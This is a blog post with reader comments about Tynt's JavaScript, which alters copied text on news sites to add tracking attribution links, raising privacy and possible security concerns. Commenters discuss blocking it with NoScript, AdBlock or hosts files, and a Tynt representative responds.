Messing With Copy/Paste Could Present Security Issues
from the just-let-copy-and-paste-work dept
John Gruber recently highlighted one of the more annoying things I’ve seen on multiple news websites lately: attempts to muck with basic copy & paste features. I’ve noticed it on Wired.com and SFGate.com among others. Gruber points out that it’s also happening on TechCrunch and The New Yorker’s website. From a user’s standpoint, what happens is that when you copy some text, and then paste it somewhere else, through some javascript shenanigans, it appends a bit of extra text that you did not copy, usually saying something like “read more:” with a URL linking back to the original story.
As someone who does a fair bit of copying and pasting in writing this blog, I agree with Gruber that this is a bit of a nuisance. It’s not a hugely annoying thing, but it is annoying. If I’m copying and pasting from your website, I know what your website is, and I am already planning to link back to it. Adding that superfluous text is just annoying and basically forcing my computer to do something I did not ask it to do.
Gruber tracked down the source of this annoyance: a company called Tynt, that not only enables this functionality for a bunch of sites that probably don’t realize how annoying it is, but also tracks what you copy by sending that info back to its server. That’s a bit creepy, frankly. Of course, since it’s javascript, it’s easy enough to block for those who know how to do that sort of thing. Still, Gruber’s analysis of this makes sense:
It’s a bunch of user-hostile SEO bullshit.
Everyone knows how copy and paste works. You select text. You copy. When you paste, what you get is exactly what you selected. The core product of the “copy/paste company” is a service that breaks copy and paste.
The pitch from Tynt to publishers is that their clipboard jiggery-pokery allows publishers to track where text copied from their website is being used, on the assumption that whoever is pasting the text is leaving the Tynt-inserted attribution URL, with its gibberish-looking tracking ID. This is, I believe, a dubious assumption. Who, when they paste such text and find this “Read more:” attribution line appended, doesn’t just delete it (and wonder how it got there)?
However, it may be even worse than that. Michael Scott points us to another analysis of this same issue, by Lance Cottrell, which highlights how this breaking the basic copy/paste functionality may be a security risk as well:
Imagine a site with sample code which (when copied) inserted some damaging code in to the middle of a large block.
I am worried that this capability exists at all within browsers. It seems like a major security vulnerability to me.
Bad things happen when you break basic functionality to shove in fun marketing tricks and spy tactics.
Comments on “Messing With Copy/Paste Could Present Security Issues”
Firefox/IE - Disable
Firefox
Tools> Options> Content tab> Uncheck enable Javascript
IE 5.5/6:
Tools> Internet Options> Security> Internet> Custom Level> Disable Active scripting
IE7:
Tools> Options> Security> Internet> Custom level> Scroll down to Scripting and select the radio button to Enable or Disable it. You may also opt for IE7 to Prompt you to allow scripts to run.
Re: Firefox/IE - Disable
That’s nice and all, but if you use ABP, you can also just block anything from http://*.tynt.com/ and that’ll take care of it, too. I also do that for doubleclick.
Re: Firefox/IE - Disable
Or install NoScript. That way you can still run scripts on sites you want to, but stay away from any cross-site scripting like this Tynt (taint?) nonsense.
Re: Re: Firefox/IE - Disable
I haven’t even seen any of this nonsense. Some guy was whining about this on Cnet.com, and I went there with Firefox/Minefield, Opera 10.70, Chrome 7 and IE8…. no problems copying and pasting.
To be clear....
… I don’t think anyone is saying the Tynt implementation is insecure (as annoying as it is), but the fundamental ability for JavaScript to be able to write to the copy/paste buffer could be a problem.
Whack a Taynt
OS News has a decent compilation article on these shenanigans.
Several people have re-posted the /etc/hosts method of blocking tynt (adding the tynt collection server to your hosts file as loopback 127.0.0.1). However I doubt it will take long before Tynt defeats this by hard coding their IPs or using a multitude of different registered host names.
Browser based fixes might also take a simplistic approach to the problem, which could then be circumvented anew.
Sounds like Javascript needs to be gimped thanks to one bunch of money grabbing assholes.
Re: Whack a Taynt
I just added their domain to adblock. Works so far and quick to update if need be,
noscript, again saves the day. Blocking scripting should be the default behavior for all browsers. Yes it would break the web as we know it, and that is a Good Thing.
Re: Re:
Agreed, NoScript is a godsend. I also find that while the right click editing context menu in the browser is disabled often times the edit selections in the main menu are still functional. But, when all else fails, disable that java script.
Re: Re:
No, it isn’t a good thing. A HELL OF A LOT of the internet relies on scripting, and it is PART OF THE HTML STANDARDS!
Now, should there be some things that scripts aren’t allowed to do? Hell yes, and Mozilla and others are realizing that and BLOCKING those behaviors today.
NoScript
I have similar feeling as @WeNeedHelp. Javascript and active scripting is a huge problem… so disable it. I use a firefox plugin called Noscript. I can add the domains that I fully trust to a whitelist and things like Tynt to the blacklist of never accepting.
I’ve never had issues with what’s considered “drive-by-scripting” hacks. When I first read your story, I was wondering what the real issue was because I’ve copied and pasted information to send to colleagues and friends from the mentioned websites, but never had anything inserted.
I’ve added Tynt to my “untrusted” list on NoScript and won’t have an issue with them ever.
I really don’t think about it, but if a site’s non-friendly to use, umm – I don’t use it.
I know that’s a – very minor – but quick way to get me to hit the ‘back’ button and proceed on down the search for another hit.
I don’t care, it’s their site – they can block what they want and it’s my choice as to what sites I want to frequent.
But I know if Techdirt blocks copy/paste; then I’ll quickly get annoyed and wander off. But I wonder…. how many more people frequent the site here maybe due to my pasting of articles with a link to the site…
There’s a few I just know offhand to skip over if I see a link on a search, because they are a pain.
NoScript is
NoScript is too much work for the average user.
I am a fairly savvy computer user. Every couple of months I give NoScript a try. I always uninstall it within a day.
Today I decide to try it again after reading this article.
On Techdirt alone I have to make decisions not only about Techdirt.com, but googlesyndication.com, backtype.com, fmpub.net and quantserve.com. Just for this one website. It is more trouble than it is worth. How much time is a user expected to devote to deciphering what is trustworthy and what is not? Even with NoScript, one mistake in allowing the wrong script and you have completely undone all your hard work.
Re: Copy/paste
Am I the only one who first pastes anything from the internet into Notepad? More than once I’ve attempted an internet copy/paste and gotten crap I didn’t want. Even happens with email and word processors today. If the program I am pasting into does not have a paste text only option, I routinely paste into Notepad first. Problem solved.
Re: Re: Copy/paste
I do that. Rocking good way to removing formatting and such.
Re: Re: Copy/paste
I only paste into Notepad if it doesn’t do the right thing at first. Ctrl+Z works in all of my programs, and 75% of the time there is no weird formatting attached.
Re: Not that much work....
I don’t review everything noscript blocks. I simply let it block everything. Sites I frequent get usually get unblocked (a two-click operation that can be permanent.) The fact is that most sites work just fine without more work than that.
Sites that require third-party scripting to work are sites I don’t visit much, but should I want to and I’m too busy/lazy to figure out which third party scripts are required, I can temporarily allow all scripts during that visit.
Re: Re: Not that much work....
I totally agree. Those people who struggle so much with NoScript always puzzle me. I’ve got it installed right now and Techdirt works fine with EVERYTHING blocked, so there’s zero need to “decipher” the 200 scripts a site tries to run.
To be quite honest, the more decent sites don’t run hundreds of scripts and you often need only enable a single script for a site to work, if any. At least that’s my experience.
Re: Re: Re: Not that much work....
Eh… not always anymore. On CNN.com, I have to allow scripts from about 10 sites or the site is broken and commenting on stories is broken.
Re: NoScript is
Trust none of them, i.e. do nothing (the default)?
At the most, trust the base site you are on if you trust the author.
Security requires effort, like math, Barbie.
Re: NoScript is
But you only have to do that for a very short time as you explore all your trusted sites.
Sure, I allow techdirt. Google syndication I don’t really need; it’s just ads. Google-analytics is an absolute nono … that’s the click and mouse tracking junk.
I’ve got all my trusted sites allowed and everything else blocked by default.
It’s really not that hard to train a new user to understand it. You teach them to first allow only temporarily the domain they are visiting, and if every thing seems ok, you allow it permanently.
If they accidentally allow all on the page, its not worse than browsing without it.
If they are too stupid to right click an icon and permit scripts, get off my computer and go home.
Just get GreasMonkey
Just get GreaseMonkey and/or AdBlock, better than turning off all JavaScript.
Re: Just get GreasMonkey
Except that NoScript is a whitelist rather than a blacklist. For AdBlock to deal with this, you would have to either add an exception yourself, or wait for your list to get updated. With NoScript, it’s automatically blocked from the get-go. And if they try tricks like changing domain names or something, that will be blocked too.
This would go one of two ways.
1. The copy/paster was going to add a link back to the original source thus all they’re gonna do is delete the extra bits and put their own link up (which is what I do at my blog).
2. The copy/paster is not going to add a link back to the original source thus all they’re gonna do is delete the extra bits.
So either you’re going to annoy the people who were going to link back anyway or add one extra step to people who weren’t going to link back anyway.
Getting to the point
I think the point of this article is that Javascript and/or Browsers should be blocking this kind of manipulations of core technology, and what was once a pretty harmless language making images appear and disappear, and simple little clocks on timers. Javascript’s former purpose reducing server / bandwidth load by making client computers do the work isn’t needed anymore nor is it being used that way. It took on a totally new role without overhauling itself and as a result turned into a huge security nightmare with ActiveX, AJAX, and other companion languages
Re: Getting to the point
Disagree there, in the beginning Javascript was a liability and a dog. Increased computing power and years of “refining” have soothed the latter.
The troubling part of this is that the AJAX approach (not really a language) is at the heart of many rich media and app-like sites that led to the (now meaningless) term “Web 2.0”.
Javascript and its ilk may show many signs of “suckiness”, but they are the present and the immediate future of countless “home grown” business apps and popular, modern websites.
Fixed it for ya
“Gruber tracked down the source of this annoyance: a company called Taynt.”
Kidding aside, if you’re going to cut/paste anything from a website, always scan the code for unnecesary stuff, whether it’s harmless or harmful, and whack it.
Clean code is happy code.
cbc.ca
cbc.ca does this now as well.
Any security expert will tell anybody who ask that scripts are the doors to the kingdom, disable them or die.
Of course some people will have you believe the contrary so they can show you ad’s 🙂
Even thought there is some virtualization(e.g. zonealarm forcefield) available from anti-virus PACKAGES see the all caps there the package not the scanner, most people don’t even know how to use it. Hint it can be as easy as ticking a box, but still those virtualization solutions still have some leaky points mainly because they try very hard to be user friendly and security is an after thought.
Any idea how Tynt sidesteps Firefox’s default disabling of clipboard manipulation by scripts?
Does it just insert a hidden citation and reposition the selection in the interval between selection and copying?
Opt-out
http://www.tynt.com/support/opt-inout/
Also, another side effect is that their JS sometimes has some odd bugs. I had an issue on the TechCrunch site the other day where it was preventing me from copying text that I had typed inside the comment box. If I’m copying and pasting my own text, there’s no conceivable reason why you’d want to muck with that.
I mentioned this on Twitter briefly and the Tynt person said they were working on it. Still, very annoying at times.
Assumptions
Hi Mike,
I just wanted to chime in to say that we respect how users feel about our product and their clipboards. We’re upfront about the opt-out feature – it’s on our homepage.
I’d like to correct the assumptions. We’re not in the business of policing copyright or recording personal identifiable information. We are a social media service that lets publishers benefit from the simplest form of sharing: copy/paste.
We’re sorry it seems creepy on the surface. That’s not the intent, nor do I believe it to be the reality. Again, for those that don’t want their anonymous data collected, they can opt-out – in the same way that you can from ad networks.
As for whether users leave the attribution link in place, many do. Millions per month. I can understand Gruber’s opinion that proper “web etiquette” dictates that we should (and are?) linking back already. That’s not emblematic of the typical internet user (Did you see Danny Sullivan’s piece on how his post was ripped off without attribution?), especially when sharing copied text via email. 70% of sharing happens via email where users are much less inclined to post a backlink.
Outside of email, the links are also left in place to a dramatic degree. These are SEO-friendly links and some publishers are seeing the results that 1000s of new links/month bring them.
As for security, we take that very seriously. We’re listening and taking note.
Thanks,
Jim Hirshfield
VP of Business Development
Tynt Multimedia
Re: Assumptions
Again, for those that don’t want their anonymous data collected, they can opt-out – in the same way that you can from ad networks.
True, I opt out of both in the same way: not letting them onto my computer in the first place. 😉
Re: Assumptions
I just wanted to chime in to say that we respect how users feel about our product and their clipboards. We’re upfront about the opt-out feature – it’s on our homepage.
Oh come on. The vast majority of people this effects will NEVER see YOUR home page. I’ve seen this “feature” on tons of sites, and none of them mention Tynt. Most people have no idea it’s your company doing this.
I’d like to correct the assumptions. We’re not in the business of policing copyright or recording personal identifiable information. We are a social media service that lets publishers benefit from the simplest form of sharing: copy/paste.
By breaking copy/paste?
We’re sorry it seems creepy on the surface. That’s not the intent, nor do I believe it to be the reality. Again, for those that don’t want their anonymous data collected, they can opt-out – in the same way that you can from ad networks.
Again, only if they know about you, but none of the sites using your thing make that clear.
As for whether users leave the attribution link in place, many do. Millions per month. I can understand Gruber’s opinion that proper “web etiquette” dictates that we should (and are?) linking back already. That’s not emblematic of the typical internet user (Did you see Danny Sullivan’s piece on how his post was ripped off without attribution?), especially when sharing copied text via email. 70% of sharing happens via email where users are much less inclined to post a backlink.
First of all, Danny’s thing was TOTALLY different. That was not a case of copy/pasting at all, but the press rewriting his article. That’s a total apples and oranges situation.
And, I’m sorry, but that’s ridiculous to think that most people don’t link back.
Outside of email, the links are also left in place to a dramatic degree. These are SEO-friendly links and some publishers are seeing the results that 1000s of new links/month bring them.
Yeah, you’re picking up SEO from spammers by annoying all people who expect copy and paste to work as it should.
What you’re doing is not a good thing.
It’s is really graveling when someone copies some content your original content form your sites and paste to some other place.It’s kinda theft from my point of view since you are stealing someone property…
Re: Re:
Graveling? It’s not theft and they’re not stealing. If they were stealing, you would be missing something after they did it. You still have everything that you had before, so they didn’t steal anything from you. I’m not saying it’s right or legal, only that it’s different from stealing.
Browser flaw being abused
Regardless of how creepy Tynt’s abuse is, this issue boils down to a browser flaw. Javascript should not be allowing access to the users’ text selection. If the only way to remove this is by blocking mouse-down/up events from the browser, so be it.
This wouldnt be anywhere near the first time a “feature” in javascript was abused horribly to break basic funcionality. Who ever thought letting web pages resized and move your browser window was a good idea? Or replacing status bar text (a HUGE security flaw).
I would much rather “approve” extended JS functionality on the few sites that legitimately use it, rather than have everything default to on. Just like Flash doesn’t leave your webcam wide open to every page you visit.
You better believe Tynt and companies like them would be snapping pictures of you with your own webcam if Flash or Javascript let them – it’s up to the web browsers to vigilantly protect us from this sort of abuse, and remove these features once companies or hackers find a way to abuse them.
What Tynt should have done
If Tynt would simply include their name somewhere in the output of the pasted text, then at least it would be more reassuring. But as it stands, most users have no idea how to opt out of this “feature”, so it is hard to believe that no wrongdoing is taking place. When you change basic functionality of the user interface, you need to hold yourself accountable.
Sure you are worm
To Mr Hirshfield,
You and your kind need to be in jail for this sort of behavior on the internet. They stick script kiddies in jail all the time for much less; yet somehow scourge like you seem to be able to avoid wearing a prison number. I wonder why that is Mr Hirshfield?
Only difference between scum like you and hackers is that you somehow manage to get a business license to do your money changing. And for the most part hacker have a sense of ethics to the computer world.
The BS line of people can “opt-out,” doesn’t wash. End users didn’t even know who pond scum like you were until we went looking to figure out who hijacked our clipboards.
One day, you and people like you will stand judgement.
It is my wish you, and parasites like you bear the full brunt of that judgement when it comes.
Have a nice day…
Write your own material.
WTF is wrong with people now-a-days? You are the laziest people. Why copy and paste *cough* steal *cough* other people’s work? If you can’t write an article yourself, close down you f’n site. You sound like a bunch of people that don’t have an original thought to yourself, you have to steal someone else’s.
Write your own material!!!
Re: Write your own material.
If you can’t write an article yourself, close down you f’n site.
You’re right, this site is terrible. You should not visit it again. Find someplace more original, and post your comments there.